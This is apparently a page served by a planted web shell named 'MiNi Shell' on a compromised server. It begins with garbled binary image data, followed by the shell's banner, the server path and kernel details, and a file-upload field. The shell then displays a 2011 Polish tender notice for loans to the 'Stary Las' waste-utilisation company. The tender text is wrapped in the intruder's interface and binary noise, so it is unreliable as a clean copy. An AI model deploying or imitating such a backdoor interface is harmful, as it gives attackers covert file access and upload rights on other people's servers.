JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110316/46444-N-2011.html

<p class="kh_header"><b>Starogard Gdański: Udzielenie i obsługę kredytu inwestycyjnego do wysokości 3.541.991,00 zł oraz kredytu uzupełniającego (obrotowego) do wysokości 3.500.000,00 zł</b><br>
<b>Numer ogłoszenia: 46444 - 2011; data zamieszczenia: 16.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Utylizacji Odpadów Komunalnych "Stary Las" Sp. z o. o. , ul. Paderewskiego 6, 83-200 Starogard Gdański, woj. pomorskie, tel. 58 775 09 90, faks 58 775 03 80.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starylas.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie i obsługę kredytu inwestycyjnego do wysokości 3.541.991,00 zł oraz kredytu uzupełniającego (obrotowego) do wysokości 3.500.000,00 zł.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje udzielenie i obsługę kredytu inwestycyjnego do wysokości 3.541.991,00 zł przeznaczonego na częściowe finansowanie wydatków kwalifikowalnych w ramach realizowanego projektu pn: Racjonalizacja gospodarki odpadami poprzez budowę Zakładu Utylizacji Odpadów Komunalnych Stary Las, oraz kredytu uzupełniającego (obrotowego) do wysokości 3.500.000,00 zł przeznaczonego na finansowanie wydatków niekwalifikowalnych w ramach powyższego projektu oraz bieżącej działalności spółki, na następujących warunkach:
- do wydatków kwalifikowalnych zalicza się wydatki poniesione zgodne z aktualnym Harmonogramem realizacji projektu (stanowiącym załącznik nr 3 do umowy o dofinansowanie) oraz aktualnymi wytycznymi w zakresie kwalifikowania wydatków w ramach POIiŚ (w ich skład wchodzą wydatki związane z nadzorem inwestorskim, robotami budowanymi i montażowymi, dostawami maszyn i urządzeń, budową drogi dojazdowej, koszty zarządzania projektem oraz promocji i reklamy);
- do wydatków niekwalikowalnych zalicza się głównie wydatki związane z VAT oraz wszystkie inne wydatki niezwiązane z realizacją projektu (działalność bieżąca spółki);
- kredyt odnawialny w PLN;
- środki pieniężne udostępnione przez bank w transzach na pisemny wniosek;
- okres kredytowania od 01.05.2011 do 31.12.2013;
- spłata kredytu będzie następowała sukcesywnie w okresie trwania linii kredytowej do zakończenia okresu kredytowania w dniu 31.12.2013 zgodnie z poniższym zestawieniem sald; 
- planowane uruchomienie linii kredytu nastąpi:
		Część I - kredyt inwestycyjny 
	- do 31.05.2012- 3.541.991,00zł.
		Część II - kredyt uzupełniający (obrotowy) 
- do 31.05.2011- 1.000.000,00zł,
- do 31.07.2011- 1.300.000,00zł, 
- do 30.06.2012- 1.500.000,00zł, 
- do 31.07.2012- 2.000.000,00zł. 
- przewidywane saldo kredytu na koniec poszczególnych miesięcy:
		Część I - kredyt inwestycyjny
	- maj 2012- 3.541.991,00zł
	- czerwiec 2012- 3.541.991,00zł
	- lipiec 2012- 3.541.991,00zł
	- sierpień 2012- 3.541.991,00zł
	- wrzesień 2012- 3.541.991,00zł
	- październik 2012- 3.541.991,00zł
	- listopad 2012- 3.541.991,00zł
	- grudzień 2012- 3.541.991,00zł
	- styczeń 2013- 3.541.991,00zł
	- luty 2013- 0,00zł. 
		Część II - kredyt uzupełniający (obrotowy) 
- maj 2011- 1.000.000,00zł
- czerwiec 2011- 1.000.000,00zł
- lipiec 2011- 2.300.000,00zł
- sierpień 2011- 2.300.000,00zł
- wrzesień 2011- 1.500.000,00zł
- październik 2011- 1.500.000,00zł
- listopad 2011- 1.500.000,00zł
- grudzień 2011- 1.500.000,00zł
- styczeń 2012- 0,00zł
- luty 2012- 0,00zł
- marzec 2012- 0,00zł
- kwiecień 2012- 0,00zł
- maj 2012- 0,00zł
- czerwiec 2012- 1.500.000,00zł
- lipiec 2012- 3.500.000,00zł
- sierpień 2012- 3.500.000,00zł
- wrzesień 2012- 3.500.000,00zł
- październik 2012- 3.500.000,00zł
- listopad 2012- 1.500.000,00zł
- grudzień 2012- 0,00zł.

Zamawiający zastrzega sobie prawo do zmiany terminarza uruchomienia linii kredytu oraz zmian terminów spłaty rat kredytu (jednak nie później niż do 31.12.2013 roku), na pisemny wniosek Zamawiającego. 

Zabezpieczenie kredytu stanowić będzie poręczenie wekslowe, udzielone przez Przedsiębiorstwo Wodociągów i Kanalizacji STAR WiK Sp. z o. o. w Starogardzie Gdańskim.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5, 66.11.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 31.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda  od wykonawców wniesienia wadium. Wadium wnosi się przed upływem terminu składania ofert. Zamawiający określa kwotę wadium w wysokości dla części I- 9.000zł, dla części II- 10.000 zł.
Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy 29 1440 1068 0000 0000 0233 6731. 
Wadium w zakresie zabezpieczenia zawarcia umowy musi uwzględniać wszystkie okoliczności jego   zatrzymania   przez   zamawiającego,   wymienione   w   art.   46   ust.   4a   i   ust.   5   Ustawy i zabezpieczać ofertę przez cały okres związania nią tj. 30 dni. Bieg terminu związania ofertą rozpoczyna się od upływu terminu składania ofert.
Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania. Wykonawcy, którego oferta zostaje wybrana jako najkorzystniejsza Zamawiający zwraca wadium niezwłocznie po zawarciu umowy oraz wniesieniu zabezpieczenia należytego wykonania umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna   powyższy   warunek   za   spełniony   o   ile   wykonawca   wykaże,   iż   uzyskał zezwolenie   do   podjęcia   działalności   gospodarczej   w   zakresie   objętym przedmiotem zamówienia. W przypadku oferty wspólnej wykonawców niniejszy warunek musi spełniać każdy z wykonawców.
W   celu   wykazania   spełniania   powyższego   warunku   wykonawca zobowiązany jest złożyć: 
-    zezwolenie   przewidziane   ustawą   Prawo   Bankowe   (Dz.   U.   z   2002r.,   nr   72,   poz.   665  z   późn. zm.) lub inny dokument równoważny uprawniający do prowadzenia działalności bankowej w Polsce.
- oświadczenie o spełnianiu warunków z art. 22 ustawy PZP.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.starylas.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego:
ul. Paderewskiego 6
83- 200 Starogard Gdański.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2011 godzina 10:00, miejsce: Siedziba Zamawiającego:
ul. Paderewskiego 6 pok. 2
83-200 Starogard Gdański.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Udzielenie i obsługę kredytu inwestycyjnego do wysokości 3.541.991,00.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje udzielenie i obsługę kredytu inwestycyjnego do wysokości 3.541.991,00 zł przeznaczonego na częściowe finansowanie wydatków kwalifikowalnych w ramach realizowanego projektu pn: Racjonalizacja gospodarki odpadami poprzez budowę Zakładu Utylizacji Odpadów Komunalnych Stary Las.
do wydatków kwalifikowalnych zalicza się wydatki poniesione zgodne z aktualnym Harmonogramem realizacji projektu (stanowiącym załącznik nr 3 do umowy o dofinansowanie) oraz aktualnymi wytycznymi w zakresie kwalifikowania wydatków w ramach POIiŚ (w ich skład wchodzą wydatki związane z nadzorem inwestorskim, robotami budowanymi i montażowymi, dostawami maszyn i urządzeń, budową drogi dojazdowej, koszty zarządzania projektem oraz promocji i reklamy);
- kredyt odnawialny w PLN;
- środki pieniężne udostępnione przez bank w transzach na pisemny wniosek;
- okres kredytowania od 01.05.2011 do 31.12.2013;
- spłata kredytu będzie następowała sukcesywnie w okresie trwania linii kredytowej do zakończenia okresu kredytowania w dniu 31.12.2013 zgodnie z poniższym zestawieniem sald; 
- planowane uruchomienie linii kredytu nastąpi:
		Część I - kredyt inwestycyjny 
	- do 31.05.2012- 3.541.991,00zł.
- przewidywane saldo kredytu na koniec poszczególnych miesięcy:
		Część I - kredyt inwestycyjny
	- maj 2012- 3.541.991,00zł
	- czerwiec 2012- 3.541.991,00zł
	- lipiec 2012- 3.541.991,00zł
	- sierpień 2012- 3.541.991,00zł
	- wrzesień 2012- 3.541.991,00zł
	- październik 2012- 3.541.991,00zł
	- listopad 2012- 3.541.991,00zł
	- grudzień 2012- 3.541.991,00zł
	- styczeń 2013- 3.541.991,00zł
	- luty 2013- 0,00zł. 
	

Zamawiający zastrzega sobie prawo do zmiany terminarza uruchomienia linii kredytu oraz zmian terminów spłaty rat kredytu (jednak nie później niż do 31.12.2013 roku), na pisemny wniosek Zamawiającego. 

Zabezpieczenie kredytu stanowić będzie poręczenie wekslowe, udzielone przez Przedsiębiorstwo Wodociągów i Kanalizacji STAR WiK Sp. z o. o. w Starogardzie Gdańskim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5, 66.11.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Udzielenie i obsługę kredytu uzupełniającego (obrotowego) do wysokości 3.500.000,00 zł.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje udzielenie i obsługę kredytu uzupełniającego (obrotowego) do wysokości 3.500.000,00 zł przeznaczonego na finansowanie wydatków niekwalifikowalnych w ramach powyższego projektu oraz bieżącej działalności spółki, na następujących warunkach:
- do wydatków niekwalikowalnych zalicza się głównie wydatki związane z VAT oraz wszystkie inne wydatki niezwiązane z realizacją projektu (działalność bieżąca spółki);
- kredyt odnawialny w PLN;
- środki pieniężne udostępnione przez bank w transzach na pisemny wniosek;
- okres kredytowania od 01.05.2011 do 31.12.2013;
- spłata kredytu będzie następowała sukcesywnie w okresie trwania linii kredytowej do zakończenia okresu kredytowania w dniu 31.12.2013 zgodnie z poniższym zestawieniem sald; 
- planowane uruchomienie linii kredytu nastąpi:
		Część II - kredyt uzupełniający (obrotowy) 
- do 31.05.2011- 1.000.000,00zł,
- do 31.07.2011- 1.300.000,00zł, 
- do 30.06.2012- 1.500.000,00zł, 
- do 31.07.2012- 2.000.000,00zł. 
- przewidywane saldo kredytu na koniec poszczególnych miesięcy:
		
		Część II - kredyt uzupełniający (obrotowy) 
- maj 2011- 1.000.000,00zł
- czerwiec 2011- 1.000.000,00zł
- lipiec 2011- 2.300.000,00zł
- sierpień 2011- 2.300.000,00zł
- wrzesień 2011- 1.500.000,00zł
- październik 2011- 1.500.000,00zł
- listopad 2011- 1.500.000,00zł
- grudzień 2011- 1.500.000,00zł
- styczeń 2012- 0,00zł
- luty 2012- 0,00zł
- marzec 2012- 0,00zł
- kwiecień 2012- 0,00zł
- maj 2012- 0,00zł
- czerwiec 2012- 1.500.000,00zł
- lipiec 2012- 3.500.000,00zł
- sierpień 2012- 3.500.000,00zł
- wrzesień 2012- 3.500.000,00zł
- październik 2012- 3.500.000,00zł
- listopad 2012- 1.500.000,00zł
- grudzień 2012- 0,00zł.

Zamawiający zastrzega sobie prawo do zmiany terminarza uruchomienia linii kredytu oraz zmian terminów spłaty rat kredytu (jednak nie później niż do 31.12.2013 roku), na pisemny wniosek Zamawiającego. 

Zabezpieczenie kredytu stanowić będzie poręczenie wekslowe, udzielone przez Przedsiębiorstwo Wodociągów i Kanalizacji STAR WiK Sp. z o. o. w Starogardzie Gdańskim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5, 66.11.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com